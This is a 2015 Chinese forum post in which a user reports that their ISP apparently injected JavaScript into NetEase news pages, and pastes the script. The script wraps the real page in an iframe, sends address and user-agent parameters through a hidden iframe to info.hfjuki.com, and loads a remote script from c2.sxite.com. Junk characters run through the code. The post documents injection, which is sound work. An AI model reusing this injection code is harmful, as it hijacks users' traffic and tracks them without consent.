|
|
本帖最后由 hudba 于 2015-2-3 00:56 编辑
- R4 V+ U0 a" w, ?# V# ?/ p& \& k3 e. L& P+ F$ V
上网易看新闻半天打不开,发现状态栏在现实访问一个奇怪的域名。心里一惊,难道电脑中毒了?赶紧查看源代码,发现后面加了一段js,真正的新闻内容给iframe了
& }9 K9 u, e K5 H V2 p$ ^' p0 r9 Q
接下来就是去搜索这个域名,得到v2ex里面也有人遇到这个问题,原来是运营商搞的鬼{:soso_e131:}
9 x( ]4 U& X% {: U8 }& j) [% Ghttps://www.google.com/search?q=info.hfjuki.com&ie=utf-8&oe=utf-8 http://www.v2ex.com/t/142197
7 h, ^+ z$ h/ s; x( N
顺便查下ip138: w" l$ L! K7 s% m# b
! I8 d! s& ^+ o$ W* g$ u
这是那段js里面的代码,好象是个半成品还没写入广告数据:- O$ ?' l8 j1 v- Z x) l! x
- function locationSearch() {
, t: F( ~! s( j6 g! f1 O - var s = getMainJs();
, t- b$ W9 A. X. _ - if (s == null) {# } V& m; \1 u6 [
- location.reload();$ U) t d/ B' G
- }5 K# ^ W- c9 k4 w0 x7 S
- return s.src.substring(s.src.indexOf(".js?") + 3, s.src.length);
* k- T# o# Y3 o$ s2 y - }
: S: ]' d. W3 w' E
0 T, e, ?3 a& X6 P! ]* ]- function getParameter(name, paraStr) {
4 F. \( D! n# c% l+ z' H. e - var result = "";
4 V% v% p) L, R - var str = "&" + paraStr.split("?")[1];
- y, _4 c7 @* h* q3 h - var paraName = "&" + name + "=";* V0 q% b4 H: U6 B- \/ f8 f9 H
- if (str.indexOf(paraName) != -1) {5 P+ j5 @! P) ]/ [
- if (str.substring(str.indexOf(name), str.length).indexOf("&") != -1) {7 x( V( o! R& F& W+ R( v5 ?
- var TmpStr = str.substring(str.indexOf(paraName), str.length);
! R+ j+ t* ]- s- Q+ g5 K/ M$ g: [ - result = TmpStr.substr(TmpStr.indexOf(paraName), TmpStr.substring(6 {: |* Z6 N6 V' l' J3 s( j
- 1, TmpStr.length).indexOf("&"): U" y+ w8 w: p* x2 }: _* k: m( @
- - TmpStr.indexOf(paraName) + 1);
+ l9 H4 x* c2 ~9 U' e" m - } else {
' Q. Z) c- D" P. A4 p. z2 t7 Z - result = str.substring(str.indexOf(paraName), str.length); T- t1 q. c$ Y
- }
: Y, T- N: M: v
# [0 d5 u& A$ B- result = result.substring(result.indexOf("=") + 1, result.length);
3 N( W: b' Y$ x - } else {
2 C! Q2 X2 v' G+ D, e# e S$ g7 s - result = "No such parameter";6 K9 p) y Z1 I' k: a3 q
- }
8 y4 C- l+ ~: x+ I; j5 l1 [ M- u - return (result.replace("&", ""));
! z( M2 @% _ |# v7 c D3 l% u - } B& ~- F1 J0 p- J9 L
- & z; z* u7 e* N( O; m3 c- w
- function getMainJs() {& m( G# R5 Q2 N& T6 `- g/ P
- var scripts = document.getElementsByTagName("script");
5 w- H- r' N1 H0 Y2 \8 Z6 i - var s = null;& k, A; }2 o3 F1 r9 H. E& E8 b+ T
- for (var i = 0; i < scripts.length; i++) {
+ B5 s- H. I6 x" S - if (scripts[i] != "undefined" && scripts[i].src.indexOf("t_c") != -1) { D9 \) m' _# J& P, C
- s = scripts[i];
% F) K* z& \0 Z' L5 g# e - break;- O$ b0 z3 b! E+ q8 ?; W* q5 e6 E# m
- }
6 L& R1 z7 N* ] h: H - }! K4 L9 o6 a2 Z7 a
- return s;1 |& |" t. B! o6 ?% v0 B- z
- }+ L2 A0 j: G, E2 [0 |" M
; G# u& k; [; q5 K1 i4 f7 o- function appendParam(oStr, aStr) {+ A, e3 r/ ^; E
- if (oStr.indexOf('?') > 0) {* E+ |7 S0 Q2 i$ f
- oStr = oStr + "&" + aStr;: M3 Z0 m) g8 N$ O- n- q
- } else {
( M8 J' ?" u( @/ u& J$ B" P - oStr = oStr + "?" + aStr;
" p6 b: g4 c) B! I9 W5 L - }
2 v/ m& m) b5 ^$ v( i2 r* y - return oStr;
7 R* k: X% ~6 J' x - }
, z" O+ o u9 W: ^) A2 }1 Q - Y1 m9 j& Z5 Y- z& R9 {: M
- window.onerror = function() {
1 K$ z& I" R8 L5 t - };
8 I, T) n3 V' \8 o4 G% p; i, W - 4 }9 z5 V) I; o& a& f$ w
- var g_titleTime = 0;
3 b. e g/ c' V - function setTcTitle() {
2 C& V! }) I3 r$ ] h( G# K - if (undefined == document) {
3 E' n8 l5 B, g6 _# n, A - g_titleTime++;
- u4 l. e+ ~+ Y7 k6 B9 A - setTimeout("setTcTitle();", 1000);1 I$ C1 m W6 V2 M; c
- return;; ~, ~! v3 N. i5 ~+ F
- }
K4 T- q. \) K/ E3 B: k - J7 m [) X' I. F* `
- var doc;7 h4 ] d. w* ~6 X
- try {7 A t" Y' m3 d8 P
- if (document.all) {) P3 g2 K8 @! ]8 D# J0 j
- doc = document.frames["cn"].document;' p# i4 B, C0 @, t9 X
- } else {
% @/ j0 f% `+ i4 s8 E - doc = document.getElementById("cn").contentDocument;9 \# T) g# n! L: H0 K' t
- }
4 O( J2 u. V& b2 _ - } catch (ex) {
) x/ s1 Z+ `# W0 Q | - }* n1 k! t7 i! w+ c$ d' ^5 X
- 5 S% f3 g# w8 |* L* ^ N/ e8 w
- if (g_titleTime < 5
: r7 D6 @) y: D, [8 } - && (undefined == doc || undefined == doc.title || "" == doc.title)) {. J- M4 P5 G9 S: {& n0 H
- g_titleTime++;
5 o/ ^" R2 V. T9 t+ {( n5 Y, l - setTimeout("setTcTitle();", 1000);
" t* _1 ^$ u" P- b# v - return;# W. v- Z! P0 e4 i/ ^ L
- } else if (undefined != doc && undefined != doc.title && "" != doc.title) {
; n3 j! x8 M0 s( b# X$ G - document.title = doc.title;
& S! [/ h5 K! C - setTcAdvVisible();& S1 @+ y) v- X1 |/ `
- }
8 ]2 E$ ~' H v( } - }+ Y2 {+ b( z0 ]# y4 s, D: f
- + W/ J0 \* ^/ L8 Y2 I+ ]
- setTimeout("setTcTitle();", 1000);
: W) l, ^0 P4 y s
+ \. O2 v* ]- _3 q6 e- var g_isHaveVisible = false;
* G3 o+ z7 l9 Q0 j1 ]+ S9 T& D - function setTcAdvVisible() {$ M& y% z( m# a
- if (undefined != document && undefined != document.getElementById("addiv")" Y( V) j) k- q- V* m" R- n3 H
- && !g_isHaveVisible) {9 d# V% o" R' d7 M7 j) {3 j; X
- document.getElementById("addiv").style.visibility = 'visible';
6 U. |* `; f9 |/ M6 j; Q B8 Y6 `( J - document.getElementById("addiv").style.display = 'block';
% t: L, G) B8 \+ t- C2 D8 n7 K - g_isHaveVisible = true;) d, P- z2 `$ G5 j, V: C% P0 q
- }
% \9 L& b( {) O! R$ ?2 @ - }
7 F2 t) R+ |8 h8 @- u- _0 C; X8 c8 G
' b! G# [& j# G- function UrlAnalyzer() {9 X. I( n+ r- ^* \2 v( |
- this.divda = "";
8 s$ B; s) p% I: q) _ - this.tctype = "";
* E. `' g; |" R! G! f - this.radius = "";
; \7 t: S+ t, b0 N/ D6 o$ N* |; Q - this.rlu = "";
. W3 Y5 S+ @& E) a( T - }
+ ]. L$ b$ Q$ e2 n6 N% W
/ r5 O+ u# Q* Z1 w; c4 e, ]- UrlAnalyzer.prototype.initParameters = function() {/ [( }, @/ T6 \3 t" ]
- var paraStr = locationSearch();
/ U+ K e3 b1 Q( G$ H- K - this.rlu = getParameter("lruedct", paraStr);
5 q9 b1 [3 w- G" j0 X7 ]0 P - this.divda = getParameter("divda", paraStr);) N! g( r& ?/ a, z4 ?
- this.radius = getParameter("radius", paraStr);
& e4 M3 x; V+ @2 B' R- I$ K - this.tctype = getParameter("tctype", paraStr);
; P" @8 p/ j% c0 W# Q ` - this.address = getParameter("address", paraStr);
: }) |/ W7 d6 U7 \5 C6 M, `( j. T0 _ - this.usagent = getParameter("usagent", paraStr);+ W W3 q" z5 G- B
- }
+ O7 Y9 s( L+ \6 y, c% n2 v2 m% \ - ) O- Y: f ?4 X# l9 l/ @2 l8 k
- UrlAnalyzer.prototype.getHtmlDoc = function() {
$ }3 w! r5 e+ `4 N" E5 y - var doc;2 ]8 P3 g, C; ^' ?
- try {
+ w! g; _" Q9 T' y& f- ? - if (document.all) {
3 N+ i1 N f5 l - doc = document.frames["cn"].document;* o% M1 y3 m+ @, o' [! a
$ t4 \# c9 f i% w4 |, t( ]- } else { D* [9 g. ^( |# z
- doc = document.getElementById("cn").contentDocument;
6 S) B1 C1 b2 y' [- ` - // doc = document.getElementById("cn").contentWindow.document;
& e# P9 }; J: ]1 d5 d3 p - }
" _. \. W2 E0 {3 {9 J5 D - } catch (ex) {
( F; v% B! v* |& w - }
; q! r2 y: g- p0 i - return doc;: G6 G; }, ?6 y/ z) k7 s8 L
- }5 z* _1 e& L( R* R" |) M
- " n* |' z5 b" I f+ ~" J
- UrlAnalyzer.prototype.setDomain = function() {3 k2 {5 h T+ Y
- if (undefined != document.title && "" == document.title)
( u! X z Y. l2 a" d - { S) J, o0 y/ Y8 Q
- var index = document.domain.indexOf(".");5 v1 L2 u v1 J; ?/ T1 h! T! S3 D
- if (undefined != index && -1 != index) {) M/ K/ n L1 w" P2 @. b+ f
- document.domain = document.domain.substring(index + 1,
6 g/ T. g# F+ z+ X6 | - document.domain.length);
3 {( K6 T! y4 a' ~- z% o. n - }& X K) o0 L" o: L+ R2 p. w9 Z( t4 U) E
-
' [3 z8 S' P/ G6 y: _3 x - var doc = this.getHtmlDoc();! f M6 r: y% c5 o! C
- if (undefined != doc && undefined != doc.title && "" != doc.title) {( j6 ~; Q/ [$ E | J; [+ Q
- document.title = doc.title;
& v6 L4 @4 k+ Z- [" n - setTcAdvVisible();
1 ]6 x6 _, L1 w7 G - }
3 d2 T: |* {3 P7 b% v - }
1 L; v0 t" W$ J+ v# ^ - }3 L! ^2 u5 h; a' \! j. A0 U
- & X# ?) \; y d2 n% n |* Y0 l! n
- UrlAnalyzer.prototype.iframeCallback = function() {- ^6 ^( c, K4 Y; S8 Z$ \
- var doc = this.getHtmlDoc();
- x% {$ o: y0 F0 v, F - if (undefined == doc || undefined == doc.title || "" == doc.title) {
# u7 G5 x8 V. r: a3 n& O# y - if (undefined != document.domain) {9 R+ `: G$ W$ S1 l
- ; _" t# u) C4 T8 q* L, C7 j" G1 Z& p
- var self = this;8 b4 u2 {+ _ q5 ?* p# ~' b
- setTimeout(function(){self.setDomain.call(self, null)}, 1000);
* Z q* @* |# U m3 ~( X4 h9 @ - // var index = document.domain.indexOf(".");& Z. p4 B' k: u* E% C8 B. E
- // if (undefined != index && -1 != index) {) z+ c. L4 z+ @, X5 c, [ d7 A! x# |+ H
- // document.domain = document.domain.substring(index + 1,
" K$ V4 \4 w) X5 I7 R+ C# | - // document.domain.length);
) ?) l+ k+ X' \6 ]& |$ [; ? - // }
5 q& l6 O7 i) l* [6 W4 N. w - //
5 \' S) u/ ^2 Z' i) m: s - // var doc = this.getHtmlDoc();
6 [4 E- }' y; ]* c" P, l - // if (undefined != doc && undefined != doc.title && "" !=- j+ x, H. v1 L# t b7 ^
- // doc.title) {
) o% v5 s0 B$ Q0 V - // document.title = doc.title;- v" U8 X, ]! x5 c- z
- // setTcAdvVisible(); \+ e3 i8 i: ^5 ^; g1 ]
- // }% B; k/ @; m$ |0 A3 F" j# o
- }
5 s) m @! T$ v) f5 n' { - } else if (undefined != doc && undefined != doc.title && "" != doc.title) {; _; u7 r3 T: x r4 J
- document.title = doc.title;, K9 A7 l9 c" A& o$ p
- setTcAdvVisible();% ~3 O2 H+ T" v4 s0 E; g! F
- }
0 {$ o! J7 L4 p Y( `( X - }
; K2 B* m: X! ~: [" j" z- [) C - 8 C- _5 E4 Q. g* b! c# [3 p. Q1 w& {2 ~
- UrlAnalyzer.prototype.executeHtmlContext = function() { [$ j+ E; V7 \# q' b( U
- var staUrl = "http://info.hfjuki.com:8060/page/statistics?advId=" + this.divda
$ D, N6 x" A" I. p - + "&rd=" + this.radius + "&tctype=" + this.divda + "&address=" + this.address + "&usagent=" + this.usagent;& S v1 `4 r. D$ j
- ! T4 K6 Q; [$ ^6 _0 G
- var htmlStr = "<iframe src="" + staUrl
3 R7 v, h, ~! Y1 v% g/ V - + "" style="display:none"></iframe>";
3 \* j+ Z0 M; n/ B; Z
$ i! ?" \% L i' p, \# U- var advUrl = htmlStr, e) h. w5 y& ?7 H2 c* n
- + "<script src="http://c2.sxite.com:8060/center?advId="! ~6 a/ c/ B2 Z: U. _: r% d
- + this.divda + "&radius=" + this.radius + "&area=1" + ""><\/script>";
# B) r* P$ o0 a4 ?- ?5 P - document.write(advUrl);
2 s5 w, x M1 W& c* d& ~ - + A5 `1 R3 V' S! _5 U7 n- m5 |1 w
- var self = this;) A& t. s- ]. F3 B2 t( k
- var iframe = document.getElementById("cn");9 p9 w$ f1 t5 {! Q- \
- if (iframe.attachEvent) {9 `, A! e5 V- ~3 L& C
- iframe.attachEvent("onload", function() {
2 |# J( U1 J6 r! h4 d - self.iframeCallback.call(self, null);
2 ?9 O Y/ z' _, K/ g5 x - });
5 Q- z7 W" G5 ]7 k5 W# `" Q+ \ - } else {6 d% i0 u& r/ b9 N- Z" W
- iframe.onload = function() {! R- y7 s O3 J
- self.iframeCallback.call(self, null);$ |2 @4 b$ c2 p( n" y
- }( K8 E g# z w' W5 M
- }9 I h/ k# o6 B) e; ^
- }
% d% N/ T- N5 y - $ K" v2 [1 l, H# W1 e# O8 }9 z" R
- UrlAnalyzer.prototype.executeMain = function() {
. ?% W) q+ r$ z8 s - var mainFrame = document.getElementById("cn");3 \' w5 X) [. v7 ]2 Z1 x6 p4 L
- mainFrame.contentWindow.location.href = mainFrame.src;2 r. p& w7 u% S
- this.initParameters();6 m) q% K0 v1 i! m- ]
- this.executeHtmlContext();( t6 x: x+ {, \! Q6 d0 M* G% }
- }9 w8 M4 Y5 S: l+ a, B+ V
- % y7 ^# U! ?4 }/ C' }
- var g_analyzer = new UrlAnalyzer();0 J3 j2 w* i6 ]4 a: t
- g_analyzer.executeMain();+ P% r; Y7 v9 r8 ]( ^
' S- \# A/ `. }/ C
/ X" A- p9 ]0 b" i4 p+ W. o |
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?立即注册
x
|
发表于 2015-2-3 00:52:03
发表于 2015-2-3 04:58:09
发表于 2015-2-3 09:49:12
